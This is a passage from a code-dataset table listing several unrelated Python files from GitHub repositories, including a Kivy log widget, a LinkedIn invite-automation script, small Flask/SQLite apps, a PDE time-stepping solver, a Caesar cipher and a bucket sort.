seq_id stringlengths 4 11 | text stringlengths 113 2.92M | repo_name stringlengths 4 125 ⌀ | sub_path stringlengths 3 214 | file_name stringlengths 3 160 | file_ext stringclasses 18
values | file_size_in_byte int64 113 2.92M | program_lang stringclasses 1
value | lang stringclasses 93
values | doc_type stringclasses 1
value | stars int64 0 179k ⌀ | dataset stringclasses 3
values | pt stringclasses 78
values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
5818447084 | from kivy.uix.widget import Widget
from kivy.uix.label import Label
from kivy.clock import Clock
from kivy.properties import NumericProperty, ListProperty, ObjectProperty
from kivy.lang import Builder
from kivy.graphics import Color, Ellipse, Line , Rectangle, Point, GraphicException
from kivy.uix.boxlayout import BoxLayout
import io
import time
# Use forward slashes: backslash sequences like "\c" are deprecated escapes
# and break on non-Windows platforms; open() accepts "/" on Windows too.
Builder.load_file("uix/consolelog/consolelog.kv")
class LogRecord(Label):
    """A single console log line; remembers when it was created for decay."""

    def __init__(self, *args, **kwargs):
        # Stamp the creation time so ConsoleLog.checkdecay can fade old lines.
        self.createtime = time.time()
        super(LogRecord, self).__init__(**kwargs)
class ConsoleLog(BoxLayout):
    """Vertical console widget that shows colorized log lines which fade
    out (decay) after `decaytime` seconds."""

    def __init__(self, *args, **kwargs):
        self.records = []        # LogRecord widgets currently displayed
        self.streampos = 0       # read offset into self.stream
        self.maxrec = 40         # maximum number of visible records
        self.decaytime = 60      # seconds before a record starts fading
        self.orientation = 'vertical'
        # Clock.schedule_interval(self.refresh, 5)
        super(ConsoleLog, self).__init__(**kwargs)

    def AddRecord(self, record):
        """Append one log line, colorized by its severity keyword."""
        line = record.strip("\n")
        if line.find('DEBUG') > 0:
            color = "AAAAAA"
        elif line.find('INFO') > 0:
            color = "AAFFAA"
        elif line.find('WARN') > 0:
            color = "EEEE99"
        elif line.find('ERROR') > 0:
            color = "FF3300"
        elif line.find('CRIT') > 0:
            color = "FF3300"
        else:
            color = "FFFFFF"
        line = u"[color={}]{}[/color]".format(color, line)
        label = LogRecord(text=line)
        self.records.append(label)
        self.add_widget(label)
        return True

    def initstream(self):
        """Create the StringIO a logger can write to and start polling it."""
        self.stream = io.StringIO()
        self.streampos = 0
        Clock.schedule_interval(self.refresh, 0)
        Clock.schedule_interval(self.checkdecay, 0.5)
        return self.stream

    def checkdecay(self, *args):
        """Fade out records older than `decaytime`, dropping fully faded ones."""
        now = time.time()
        # Iterate over a copy so faded records can be dropped from self.records.
        for record in self.records[:]:
            age = now - record.createtime
            # BUGFIX: the original tested self.opacity (the whole console's
            # opacity) instead of the individual record's opacity.
            if record.opacity != 0 and age > self.decaytime:
                record.opacity = 1 - (age - self.decaytime) / 100
                if record.opacity < 0.05:
                    # BUGFIX: also forget the record; the original removed the
                    # widget but left it in self.records, leaking entries.
                    self.records.remove(record)
                    self.remove_widget(record)

    def refresh(self, *args):
        """Poll the stream for a newly written line and display it."""
        self.stream.seek(self.streampos)
        record = self.stream.readline()
        if record != '':
            self.AddRecord(record)
            while len(self.records) > self.maxrec:
                self.remove_widget(self.records.pop(0))
        self.streampos = self.stream.tell()
| aaaler/k9 | kpilot/uix/consolelog/ConsoleLog.py | ConsoleLog.py | py | 2,434 | python | en | code | 1 | github-code | 50 |
72049113436 | #!/usr/bin/python
# -*- coding: utf-8 -*-
class Business(object):
    """Supplies a hard-coded Yelp-style business record (used as a fixture)."""

    def get_business(self):
        """Return a fresh dict describing one sample business."""
        record = dict(
            address='1835 E Guadalupe Rd, Ste 106',
            city='Tempe',
            id='--9QQLMTbFzLJ_oT-ON3Xw',
            is_open=1,
            latitude=33.3617,
            longitude=-111.91,
            name='Great Clips',
            neighborhood='',
            postal_code='85283',
            review_count=9,
            stars=3.0,
            state='AZ',
        )
        return record


# Module-level instance kept for existing importers.
model = Business()
| Cedric-Chen/ShopMe | datamodel_test/business.py | business.py | py | 549 | python | en | code | 0 | github-code | 50 |
8213765542 | # import os
# from win32com.client import Dispatch
# import shutil
# import winreg
# from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
# from selenium import webdriver
# from selenium.webdriver.common.by import By
# from selenium.webdriver.chrome.service import Service
# from selenium.webdriver.support.ui import WebDriverWait
# from datetime import datetime
# import time
# from stem import Signal
# chromedriver_path = os.path.abspath("chromedriver.exe")
# Chrome_UserData_path = os.path.join(os.getenv('LOCALAPPDATA'), 'Google\\Chrome\\User Data')
# Chrome_profile_path = os.path.abspath("Chrome_Data\\")
# Chrome_Path = None
# Range_browser_open = None
# Chrome_Data_path = os.path.abspath("Chrome_Data\\")
# def find_chrome_path():
# # Check the default installation path
# default_path = r'C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe'
# if os.path.isfile(default_path):
# return default_path
# default_path = r'C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe'
# if os.path.isfile(default_path):
# return default_path
# # Check the registry for other installation paths
# reg_path = r'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\chrome.exe'
# with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, reg_path, 0, winreg.KEY_READ) as key:
# value = winreg.QueryValueEx(key, None)[0]
# if os.path.isfile(value):
# return value
# # Chrome not found
# return None
# def create_chrome_shortcut(Chrome_Path,no):
# # Find the Chrome executable path
# if Chrome_Path is None:
# Chrome_Path = find_chrome_path()
# # Create a Chrome profile directory
# profile_dir = os.path.join(Chrome_profile_path, 'UserProfile_{}'.format(str(no)))
# if not os.path.exists(profile_dir):
# os.makedirs(profile_dir)
# # Copy an existing Preferences file to the profile directory, chrome://version/
# preferences_file = os.path.join(Chrome_UserData_path, 'Default\\Preferences')
# if not os.path.exists(preferences_file):
# preferences_file = os.path.join(Chrome_UserData_path, 'Guest Profile\\Preferences')
# new_preferences_file = os.path.join(profile_dir, 'Preferences')
# shutil.copy(preferences_file, new_preferences_file)
# # Create the shortcut
# shortcut_path = os.path.join(Chrome_profile_path, f"ChromeShortCut_{str(no)}.lnk")
# # Check if the shortcut file exists
# if not os.path.exists(shortcut_path):
# # Create the shortcut
# import pythoncom
# # Call CoInitialize
# pythoncom.CoInitialize()
# # Your code that uses COM components goes here...
# shell = Dispatch('WScript.Shell')
# shortcut = shell.CreateShortCut(shortcut_path)
# shortcut.TargetPath = Chrome_Path
# shortcut.Arguments = "--user-data-dir=\"" + profile_dir + "\""
# shortcut.save()
# # Call CoUninitialize when you're finished with the COM components
# pythoncom.CoUninitialize()
# # Launch the shortcut
# # os.startfile(shortcut_path)
# return Chrome_Path
# def connect_driver(no):
# try:
# profile_path = os.path.join(Chrome_profile_path, 'UserProfile_{}'.format(str(no)))
# options = webdriver.ChromeOptions()
# options.add_argument("start-maximized")
# # options.add_experimental_option("excludeSwitches", ["enable-automation"])
# # options.add_experimental_option('useAutomationExtension', False)
# # options.add_experimental_option("debuggerAddress", f"localhost:{port}")
# options.add_argument('--disable-notifications')
# options.add_argument('--disable-geolocation')
# options.add_argument("--disable-features=WebUSB")
# options.add_argument("--disable-extensions")
# options.add_argument("--disable-popup-blocking")
# options.add_argument(
# 'user-agent=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36')
# options.add_argument(
# 'Accept=text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8')
# options.add_argument('Accept-Language=en-US,en;q=0.5')
# options.add_argument('Connection=keep-alive')
# options.add_argument('Upgrade-Insecure-Requests=1')
# options.add_argument('Sec-Fetch-Dest=document')
# options.add_argument('Sec-Fetch-Mode=navigate')
# options.add_argument('Sec-Fetch-Site=none')
# options.add_argument('Sec-Fetch-User=?1')
# options.add_argument('Pragma=no-cache')
# options.add_argument('Cache-Control=no-cache')
# options.add_argument("user-data-dir=" + profile_path) # Path to your chrome profile
# ser = Service(chromedriver_path)
# driver = webdriver.Chrome(service=ser, options=options)
# wait = WebDriverWait(driver, 10)
# return driver
# except Exception as e:
# print(e)
# pass
# create_chrome_shortcut(Chrome_Path=Chrome_Path, no=1)
# browser = connect_driver(1)
# # browser.get("https://www.linkedin.com/events/gibsonreports-virtualrssevent-p6756991161354784768/")
# time.sleep(1)
import asyncio
from pyppeteer import launch
from time import sleep
async def invite_connections_to_event(event_url):
    """Log in to LinkedIn and invite the first 10 listed connections to an event.

    NOTE(review): relies on hard-coded CSS selectors / XPaths for LinkedIn's
    DOM, which are brittle and likely to break when the page layout changes.
    """
    # Raw string prevents backslash escape sequences in the Windows path.
    browser = await launch(
        executablePath=r'C:\Program Files\Google\Chrome\Application\chrome.exe',
        headless=False)
    page = await browser.newPage()
    await page.setViewport({'width': 1366, 'height': 1080})
    # Sign in to LinkedIn.
    # BUGFIX: use asyncio.sleep instead of time.sleep — a blocking sleep
    # stalls the whole event loop inside a coroutine.
    await page.goto('https://www.linkedin.com/login')
    await page.waitForSelector('#username')
    await page.type('#username', '*********')  # Replace with your LinkedIn email
    await asyncio.sleep(1)
    await page.type('#password', '***********')  # Replace with your LinkedIn password
    await asyncio.sleep(1)
    await page.click('button[type="submit"]')
    await page.waitForNavigation()
    await asyncio.sleep(2)
    # Navigate to the event page
    await page.goto(event_url)
    await page.waitForSelector('#ember41')
    # Click the "Invite" button
    await page.click('button[data-control-name="invite_attendees"]')
    await asyncio.sleep(5)
    # Scroll until the connection list stops growing (infinite scroll).
    scroll_height = await page.evaluate('() => document.documentElement.scrollHeight')
    while True:
        await page.evaluate('window.scrollTo(0, document.documentElement.scrollHeight)')
        # Brief pause to allow content to load.
        await asyncio.sleep(1)
        new_scroll_height = await page.evaluate('() => document.documentElement.scrollHeight')
        # Stop once the scroll height no longer changes.
        if new_scroll_height == scroll_height:
            break
        scroll_height = new_scroll_height
    # Tick the checkboxes of the first 10 listed members.
    for invitee_index in range(1, 11):
        invitee_container = await page.xpath(
            f'/html/body/div[3]/div/div/div[2]/div/div[1]/div/div[2]/div[1]/div[2]/div/div[1]/ul/li[{invitee_index}]')
        print(invitee_container)
        await asyncio.sleep(0.5)
        if invitee_container:
            invitee_checkbox = await invitee_container[0].querySelector('input[type="checkbox"]')
            if invitee_checkbox:
                await invitee_checkbox.click()
    await asyncio.sleep(2)
    # Press the "Invite" confirmation button.
    invite = await page.xpath("/html/body/div[3]/div/div/div[2]/div/div[2]/div/button")
    print(invite)
    await asyncio.sleep(1)
    await invite[0].click()
    await asyncio.sleep(2)
    # Close the invite dialog if it is still open.
    try:
        await page.click('.artdeco-modal .artdeco-modal__dismiss')
    except Exception:
        # BUGFIX: narrow the bare `except:` so KeyboardInterrupt etc. escape.
        pass
    await page.waitForNavigation()
    # Close the browser
    await browser.close()
# Usage example
event_url = 'https://www.linkedin.com/events/gibsonreports-virtualrssevent-p6756991161354784768/'
# asyncio.run creates and closes a fresh event loop; calling
# get_event_loop().run_until_complete for this is deprecated since 3.10.
asyncio.run(invite_connections_to_event(event_url))
| jaykakadiya18/linkedin-auto | main.py | main.py | py | 8,442 | python | en | code | 0 | github-code | 50 |
22933510217 | from flask import Flask
from test import db
import json
# from gevent import pywsgi
server=Flask(__name__)
sql='SELECT * from user_message '
@server.route('/login', methods=['get'])
def login():
    """Return the first user's name/age/sex as JSON.

    BUGFIX: the original returned None when the query produced no rows,
    which makes Flask raise a 500; an explicit empty body is returned instead.
    """
    res = db.my_db(sql)
    if res:
        payload = {
            'Name': res[0][1],
            'Age': res[0][3].strftime('%Y-%m-%d'),
            'sex': res[0][2],
        }
        return json.dumps(payload, ensure_ascii=False, indent=4)
    return json.dumps({}, ensure_ascii=False), 404
server.run(host='127.0.0.1',port=8998,debug=True)
| 17621445641/duitang_back_end | test/user_message_get接口.py | user_message_get接口.py | py | 520 | python | en | code | 0 | github-code | 50 |
18552393261 | import cv2
import numpy as np
import xml.etree.ElementTree as ET
class Pedestrian:
    """Projects ground-truth 2D pedestrian positions into camera images.

    Ground-truth points are world coordinates with z assumed 0; they are
    projected using the camera intrinsics/extrinsics loaded from XML files.
    """

    def __init__(self, gt_file, extrinsics_file, intrinsics_file):
        self.cont = 0  # index of the next frame to process
        self.labels = self.read_txt(gt_file)
        self.cameraMatrix, self.distCoeffs = self.read_intrinsics(intrinsics_file)
        self.rvec, self.tvec = self.read_extrinsics(extrinsics_file)
        self.trajectoria = []  # projected image positions accumulated so far

    def read_intrinsics(self, filename):
        """Load the 3x3 camera matrix and distortion coefficients from XML."""
        root = ET.parse(filename).getroot()
        camera_matrix = np.array(root.find('camera_matrix/data').text.split(),
                                 dtype='float32').reshape((3, 3))
        dist_coeffs = np.array(root.find('distortion_coefficients/data').text.split(),
                               dtype='float32').reshape(-1, 1)
        return camera_matrix, dist_coeffs

    def read_extrinsics(self, filename):
        """Load the rotation (rvec) and translation (tvec) vectors from XML."""
        root = ET.parse(filename).getroot()
        rvec = np.array(root.find('rvec').text.split(), dtype='float32')
        tvec = np.array(root.find('tvec').text.split(), dtype='float32')
        return rvec, tvec

    def detect(self, frame):
        """Draw the current frame's ground-truth pedestrians onto *frame*.

        Advances the internal frame counter, appends each projected point to
        self.trajectoria, and returns the annotated frame.
        """
        image_id = self.cont
        if image_id in self.labels:
            # Ground truth is 2D; lift to 3D with z == 0 for projectPoints.
            points_3d = [(x, y, 0) for x, y in self.labels[image_id]]
            points_2d, _ = cv2.projectPoints(
                np.array(points_3d, dtype='float32'),
                self.rvec, self.tvec, self.cameraMatrix, self.distCoeffs)
            # Draw a filled circle at each projected position.
            for point in points_2d:
                x, y = map(int, point.ravel())
                self.trajectoria.append((x, y))
                cv2.circle(frame, (x, y), 15, (0, 255, 0), -1)
            print(self.trajectoria)  # debug output kept from the original
        self.cont += 1
        return frame

    def read_txt(self, filename):
        """Parse 'frame x y' lines into {frame_number: [(x, y), ...]}."""
        labels = {}
        with open(filename) as f:
            for line in f:
                frame_number, x, y = map(float, line.strip().split())
                # setdefault replaces the original if/else membership dance.
                labels.setdefault(int(frame_number), []).append((x, y))
        return labels

    def reset_parameters(self):
        """Restart processing from the first frame with an empty trajectory."""
        self.cont = 0
        self.trajectoria = []
def check_is_looped(BR):
    """Return True if the directed edge list *BR* contains a cycle.

    BR is an iterable of (src, dst) pairs.  The graph is repeatedly pruned
    down to vertices that have both incoming and outgoing edges; reaching a
    non-empty fixpoint means a self-sustaining loop exists.
    """
    # Build adjacency sets: src -> {dst, ...}
    graph = {}
    for src, group in groupby(sorted(BR), key=lambda edge: edge[0]):
        graph[src] = {dst for _, dst in group}
    while True:
        # Vertices appearing both as a source and as a destination.
        vertex_set = set(graph).intersection(chain.from_iterable(graph.values()))
        sub_graph = {src: vertex_set & dsts for src, dsts in graph.items()
                     if src in vertex_set and vertex_set & dsts}
        if sub_graph == graph:
            break
        graph = sub_graph
    # A non-empty fixpoint subgraph implies a cycle.
    return bool(graph)
| ArturSavchuk/decision_support | Lab1/is looped checking.py | is looped checking.py | py | 528 | python | en | code | 0 | github-code | 50 |
11172453620 | import os
import torch
import PIL.Image as Image
import matplotlib.pyplot as plt
import sys
sys.path.append("/home/ubuntu/Desktop/Domain_Adaptation_Project/repos/biastuning/")
from utils import *
results_folder_name = 'endovis18_10label_textaffine_decdertuning_4e-4_adamw_focal_alpha75e-2_gamma_2_256_bs64_rsz_manyaug_blanklables'

ious_all = {}
# Debug/inspection loop: crops a fixed ROI out of the prediction and
# ground-truth masks, binarizes both, and displays them for comparison.
for obj_name in os.listdir(results_folder_name):  # renamed: `object` shadows a builtin
    ious = []
    print("Starting object: ", obj_name)
    preds_path = os.path.join(results_folder_name, obj_name, 'rescaled_preds')
    gt_path = os.path.join(results_folder_name, obj_name, 'rescaled_gt')
    for i, im in enumerate(os.listdir(gt_path)):
        if i < 13:
            continue  # skip the first 13 frames
        label = np.array(Image.open(os.path.join(gt_path, im)))[60:306, 150:400]
        label = (label > 127) + 0  # binarize to {0, 1}
        pred = np.array(Image.open(os.path.join(preds_path, im)))[60:306, 150:400]
        pred = (pred > 127) + 0
        plt.imshow(label)
        plt.show()
        # BUGFIX: the original displayed `label` twice; show the prediction.
        plt.imshow(pred)
        plt.show()
        print(label.shape)
        print(pred.shape)
        print(np.unique(pred))
1/0 | JayParanjape/biastuning | eval/endovis18/calculate_ious.py | calculate_ious.py | py | 1,089 | python | en | code | 26 | github-code | 50 |
29210778507 | from flask import Flask, render_template, request, flash, g
from flask_bootstrap import Bootstrap
from sqlite3 import connect, Connection
from datetime import datetime
app = Flask(__name__)
Bootstrap(app)
app.secret_key = 'development key'
from forms import ServiceRequestForm, ClientRegistrationForm
DATABASE = '../db/easydoesit.db'
def connect_db():
    """Open and return a sqlite3.Connection to the application database."""
    db_connection = connect(DATABASE)
    return db_connection
def close_db(connection):
    """Close a previously opened database connection."""
    connection.close()
def service_type_to_id(service_type):
    """Converts a service type string to an integer service type ID."""
    db = connect_db()
    if not db:
        return '404'
    try:
        c = db.cursor()
        # BUGFIX: bind the parameter as a 1-tuple; passing the bare string
        # makes sqlite3 treat every character as a separate parameter.
        c.execute("""SELECT stid FROM Services WHERE type=?""", (service_type,))
        num = c.fetchone()
    finally:
        # BUGFIX: always release the connection, even if the query raises.
        db.close()
    return num
@app.route("/")
def welcome():
    """Landing page for the service."""
    greeting = "Welcome to the app"
    return greeting
@app.route('/dispatch', methods=['GET'])
def dispatch_view():
    """List all service requests joined with their clients for dispatchers."""
    db = connect_db()
    if not db:
        return "couldn't find db"
    c = db.cursor()
    # name, time, urgency, phone, gender_pref
    c.execute("""select c.name, sr.start_time, sr.emergency_level,
              c.phone_number, sr.gender_pref
              FROM Clients as c JOIN ServiceRequests sr ON
              c.cid = sr.cid""")
    # BUGFIX: the original assigned `service_reqs` but rendered the undefined
    # name `service_requests`, raising a NameError on every request.
    service_requests = c.fetchall()
    db.close()
    return render_template('service_request.html', service_requests=service_requests)
@app.route('/service_request', methods=['GET', 'POST'])
def service_request():
    """Create a service request (POST with JSON body) or render the form (GET)."""
    if request.method == 'POST':
        db = connect_db()
        if not db:
            return '404'
        params = request.get_json()
        service_type_string = params['Type']
        tid = service_type_to_id(service_type_string)
        loc = params['DestinationLocation']
        rsn = params['Reason']  # currently unused; kept for future auditing
        name = params['Name']
        gen = params['Gender']
        start_time = str(datetime.now())
        c = db.cursor()
        # BUGFIX: bind parameters as a tuple — a bare string binds each
        # character as a separate parameter.
        c.execute("select cid from Clients where name = ?;", (name,))
        uid = c.fetchone()
        # BUGFIX: placeholders must not be quoted; '?' inside quotes is a
        # string literal, not a parameter marker.
        c.execute("""INSERT INTO ServiceRequests
                  (cid, service_type, address, start_time, emergency_level,
                  gender_pref) VALUES (?, ?, ?, ?, ?, ?);""",
                  (uid, tid, loc, start_time, 2, gen))
        # BUGFIX: commit before closing, otherwise the insert is discarded.
        db.commit()
        db.close()
        return 'Good'
    elif request.method == 'GET':
        form = ServiceRequestForm()
        return render_template('service_request.html', form=form)
def main():
    """Start the Flask development server, listening on all interfaces."""
    app.run(host='0.0.0.0')
if __name__ == '__main__':
main()
| mfitton/easydoesitBB | src/app.py | app.py | py | 2,455 | python | en | code | 0 | github-code | 50 |
25770588657 | import numpy as np
import utilities as util
class TimeStepping():
    """Explicit time integrator (forward Euler or classic RK4) for the mesh.

    Wires together the mesh, flux, boundary, and source objects produced by
    ``param.initialize_objects()`` and handles progress reporting, CSV
    output, and l2-error diagnostics during the run.
    """
    def __init__(self, param):
        # Initialize objects using param
        self.param = param
        self.mesh, self.uw, self.flux, self.boundary, self.sources = \
            param.initialize_objects()
        # Aliasing functions for convenience
        self.apply_boundary_conditions = self.boundary.apply_boundary_conditions
        self.average_solutions = self.mesh.average_solutions
        self.compute_all_fluxes = self.flux.compute_all_fluxes
        self.get_solutions = self.mesh.get_solution_matrices
        self.save_solutions = self.mesh.save_solution_matrices_to_csv
        self.set_solutions = self.mesh.set_solutions
        self.source_fcn = self.sources.source_fcn
        # Aliasing attributes for convenience
        self.init_fcn_list = param.init_fcn_list
        self.solution_setter_tuple = self.mesh.solution_setter_tuple
        self.time_method = param.time_method
        # Aliasing parameters
        self.cell_vol_m = self.mesh.cell_vol_m
        self.exact_solution_fcn_list = self.sources.exact_solution_fcn_list
        # Solution grids include one ghost cell on each side (hence the +2).
        self.solution_shape = (param.Nx + 2, param.Nz + 2)
        self.Nt = param.Nt
        self.x_ct_m, self.z_ct_m = self.mesh.x_ct_m, self.mesh.z_ct_m
        # Compute common parameters
        self.Dt = param.tf / param.Nt
        # NOTE(review): likely a typo for "inv_cell_vol_m" (1 / cell volume);
        # the name is kept since compute_R depends on it.
        self.inv_cell_col_m = 1.0 / self.cell_vol_m
        # For showing progress and saving results
        self.csv_period = self.compute_step_period(param.num_csv)
        self.l2_error_period = param.l2_error_period
        self.psg_period = self.compute_step_period(param.num_msg)
    def compute_step_period(self, total_num):
        """Return the step interval that yields about *total_num* events
        over the whole run; a non-positive count disables the event."""
        total_num = min(total_num, self.Nt)
        if total_num <= 0:
            # Period larger than Nt means the event never fires.
            step_period = self.Nt + 1
        else:
            step_period = self.Nt // total_num
        return step_period
    def show_progress(self, step_no, prefix="=> Progress: ", end="\r"):
        """Print a progress message every `psg_period` steps."""
        if step_no % self.psg_period == 0:
            t = round(step_no * self.Dt, 10)
            print(
                prefix + "%1.2f%%, t = " % (step_no / self.Nt * 100) +
                str(t) + "s ",
                end=end,
            )
    def save_step_result_to_csv(self, step_no):
        """Write the current solution matrices to CSV every `csv_period` steps."""
        if step_no % self.csv_period != 0:
            return
        t = self.Dt * step_no
        self.save_solutions(t=("%1.4fs" % t), theta_to_T=True)
        print("Saved solutions at t = " + str(round(t, 10)) + "s. ")
    def compute_l2_error(self, step_no, force=False):
        """Print relative/absolute l2 errors vs. the exact solution.

        No-op when no exact solution is configured; runs every
        `l2_error_period` steps unless *force* is True.
        """
        def l2_norm(sol_m):
            # Volume-weighted discrete l2 norm.
            return np.sum(self.cell_vol_m * (sol_m ** 2)) ** 0.5
        def l2_error(numer_sol_m, exact_sol_m):
            abs_l2_error = l2_norm(sol_m=numer_sol_m - exact_sol_m)
            exact_sol_norm = l2_norm(sol_m=exact_sol_m)
            relative_l2_error = abs_l2_error / exact_sol_norm
            return relative_l2_error, abs_l2_error, exact_sol_norm
        exact_fcn_list = self.exact_solution_fcn_list
        if exact_fcn_list is None:
            return
        if force or step_no % self.l2_error_period == 0:
            t = self.Dt * step_no
            xzt_tuple = (self.x_ct_m, self.z_ct_m, t)
            # One (rel, abs, norm) triple per solution field.
            l2_error_norm_tuple = tuple(
                l2_error(
                    numer_sol_m=sol_m,
                    exact_sol_m=exact_fcn(*xzt_tuple)
                )
                for sol_m, exact_fcn in
                zip(self.get_solutions(), exact_fcn_list)
            )
            rel_errors, abs_errors, l2_norms = tuple(zip(*l2_error_norm_tuple))
            msg_prefix = "\nl2 errors at t = " + str(round(t, 10)) + "s:\n"
            indent = " " * 4
            header = indent + " " * 12 + \
                "{:^10} | {:^10} | {:^10} | {:^10}\n".format(
                    "theta", "qv", "qc", "qp"
                )
            msg = msg_prefix + header + \
                indent + "rel error : %1.4e | %1.4e | %1.4e | %1.4e\n" + \
                indent + "abs error : %1.4e | %1.4e | %1.4e | %1.4e\n" + \
                indent + "l2 norm   : %1.4e | %1.4e | %1.4e | %1.4e\n"
            print(msg % (rel_errors + abs_errors + l2_norms))
    def save_exact_solution_to_csv(self, t):
        """Evaluate the exact solutions at time *t* and dump them to CSV."""
        exact_sol_matrix_list = [
            exact_sol_fcn(self.x_ct_m, self.z_ct_m, t)
            for exact_sol_fcn in self.exact_solution_fcn_list
        ]
        filename_list = ["exact_theta", "exact_qv", "exact_qc", "exact_qp"]
        self.mesh.save_matrices_to_csv(
            matrix_list=exact_sol_matrix_list,
            filename_list=filename_list,
            results_folder_name="solutions",
            filename_suffix=("_%1.4fs" % t),
        )
    def apply_initial_conditions(self):
        """Save run metadata and set the initial solution on the mesh.

        Falls back to the exact solutions when no explicit initial
        conditions were supplied; raises if neither is available.
        """
        init_fcn_list = self.param.init_fcn_list
        if init_fcn_list is None:
            init_fcn_list = self.exact_solution_fcn_list
        if init_fcn_list is None:
            raise Exception("Did not assign correct initial conditions!")
        self.param.save_to_txt()
        self.param.save_to_csv()
        self.mesh.save_coord_matrices_to_csv()
        self.mesh.apply_initial_conditions(init_fcn_list=init_fcn_list)
    def compute_R(self, t):
        """Return the right-hand side (flux divergence + sources) at time *t*,
        one matrix per solution field."""
        S_tuple, V_Ts = self.source_fcn(t=t)
        GG_t_tuple, GG_b_tuple, FF_r_tuple, FF_l_tuple = \
            self.compute_all_fluxes(V_Ts=V_Ts)
        R_tuple = tuple(
            self.inv_cell_col_m * (GG_b - GG_t + FF_l - FF_r) + S
            for GG_t, GG_b, FF_r, FF_l, S in zip(
                GG_t_tuple, GG_b_tuple, FF_r_tuple, FF_l_tuple, S_tuple,
            )
        )
        return R_tuple
    def forward_euler(self):
        """Integrate from t=0 to tf with first-order explicit Euler steps."""
        Dt = self.Dt
        self.apply_initial_conditions()
        for step_no in range(self.Nt):
            t = Dt * step_no
            self.save_step_result_to_csv(step_no=step_no)
            self.show_progress(step_no=step_no, end="\n")
            solution_tuple = self.get_solutions()
            R_tuple = self.compute_R(t)
            new_solution_tuple = tuple(
                sol + Dt * R
                for sol, R in zip(solution_tuple, R_tuple)
            )
            # NOTE(review): boundary conditions are applied *before* the new
            # solutions are installed — verify this ordering is intentional.
            self.apply_boundary_conditions()
            self.set_solutions(*new_solution_tuple)
            self.compute_l2_error(step_no=step_no + 1)
            # self.save_exact_solution_to_csv(t=t)
        print("\n[Final time]", end=" ")
        self.compute_l2_error(step_no=self.Nt, force=True)
        self.save_step_result_to_csv(step_no=self.Nt)
    def runge_kutta_intermediate_step(
        self, Delta_t, t, solution_copy_tuple, k_m_tuple,
    ):
        """One of the first three RK4 stages: accumulate R into the stage
        sums (k_m_tuple, in place) and install the trial solution."""
        R_tuple = self.compute_R(t)
        # In-place += accumulates this stage's slope into the running sum.
        for k_m, R in zip(k_m_tuple, R_tuple):
            k_m += R
        for sol_copy, R, set_sol in zip(
            solution_copy_tuple, R_tuple, self.solution_setter_tuple,
        ):
            set_sol(sol_copy + Delta_t * R)
        self.apply_boundary_conditions()
    def runge_kutta_final_step(self, Delta_t, t, solution_copy_tuple, k_m_tuple):
        """Final RK4 stage: combine the accumulated slopes with the last R
        and install the end-of-step solution."""
        R_tuple = self.compute_R(t)
        for sol_copy, R, k_m, set_sol in zip(
            solution_copy_tuple, R_tuple, k_m_tuple, self.solution_setter_tuple,
        ):
            set_sol(sol_copy + Delta_t * (k_m + R))
        self.apply_boundary_conditions()
    def runge_kutta_4(self):
        """Integrate from t=0 to tf with classic fourth-order Runge-Kutta."""
        solution_shape, Dt = self.solution_shape, self.Dt
        half_Dt = 0.5 * Dt
        self.apply_initial_conditions()
        Delta_t_list = [half_Dt, half_Dt, Dt]
        for step_no in range(self.Nt):
            t = Dt * step_no
            self.show_progress(step_no=step_no, end="\n")
            self.save_step_result_to_csv(step_no=step_no)
            # Step 0
            solution_copy_tuple = tuple(
                np.copy(sol_m) for sol_m in self.get_solutions()
            )
            k_m_tuple = tuple(np.zeros(solution_shape) for _ in range(4))
            # Steps 1-3
            intermediate_t_list = [t + half_Dt, t + half_Dt, t + Dt]
            for Delta_t, interm_t in zip(Delta_t_list, intermediate_t_list):
                self.runge_kutta_intermediate_step(
                    Delta_t=Delta_t,
                    t=interm_t,
                    solution_copy_tuple=solution_copy_tuple,
                    k_m_tuple=k_m_tuple,
                )
            # Step 4
            self.runge_kutta_final_step(
                Delta_t=Dt / 6.0,
                t=t + Dt,
                solution_copy_tuple=solution_copy_tuple,
                k_m_tuple=k_m_tuple,
            )
            self.average_solutions(step_no=step_no + 1)
            self.compute_l2_error(step_no=step_no + 1)
        self.save_step_result_to_csv(step_no=self.Nt)
        print("\n[Final time]", end=" ")
        self.compute_l2_error(step_no=self.Nt, force=True)
    def timestep(self):
        """Dispatch to the integrator selected by param.time_method."""
        time_method = self.param.time_method
        if time_method == "forward_euler":
            self.forward_euler()
        elif time_method == "rk4":
            self.runge_kutta_4()
        else:
            raise Exception("Unknown time stepping method!")
if __name__ == "__main__":
pass
| chuckjia/weather | timesteps.py | timesteps.py | py | 9,077 | python | en | code | 0 | github-code | 50 |
75057405594 | #-*-coding: utf-8-*-
class CaesarCipher:
    """Caesar cipher over the uppercase Latin alphabet.

    Input is uppercased before translation, so output is always uppercase;
    characters outside A-Z pass through unchanged.
    """

    def __init__(self, key):
        self.key = int(key)
        self.abc = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"

    def encode(self, txt):
        """Encrypt *txt* by shifting letters forward by the key."""
        return self.translate(txt, "e")

    def decode(self, txt):
        """Decrypt *txt* by shifting letters backward by the key."""
        return self.translate(txt, "d")

    def translate(self, txt, m):
        """Shift letters of *txt*; m == "d" decodes, anything else encodes."""
        translated = ""
        txt = txt.upper()
        for char in txt:
            if char not in self.abc:
                translated += char
            else:
                indx = self.abc.find(char)
                if m == "d":
                    indx -= self.key
                else:
                    indx += self.key
                # BUGFIX: modulo handles wrap-around for any key size; the
                # original single +/- 26 correction raised IndexError for
                # shifts beyond two alphabets.
                translated += self.abc[indx % len(self.abc)]
        return translated
37091507423 | from functools import reduce
def bucket_sort(items):
    """Sort a sequence of floats in [0, 1) using bucket sort.

    Returns a new sorted list; the input sequence is not modified.
    """
    n = len(items)
    if n == 0:
        # BUGFIX: the original reduce() over zero buckets raised TypeError.
        return []
    buckets = [[] for _ in range(n)]
    for item in items:
        # BUGFIX: scale by the bucket count instead of a fixed factor of 10
        # (which raised IndexError for item >= n / 10); min() keeps the
        # maximum value in range.
        index = min(int(item * n), n - 1)
        buckets[index].append(item)
    result = []
    for bucket in buckets:
        result.extend(sorted(bucket))
    return result
if __name__ == "__main__":
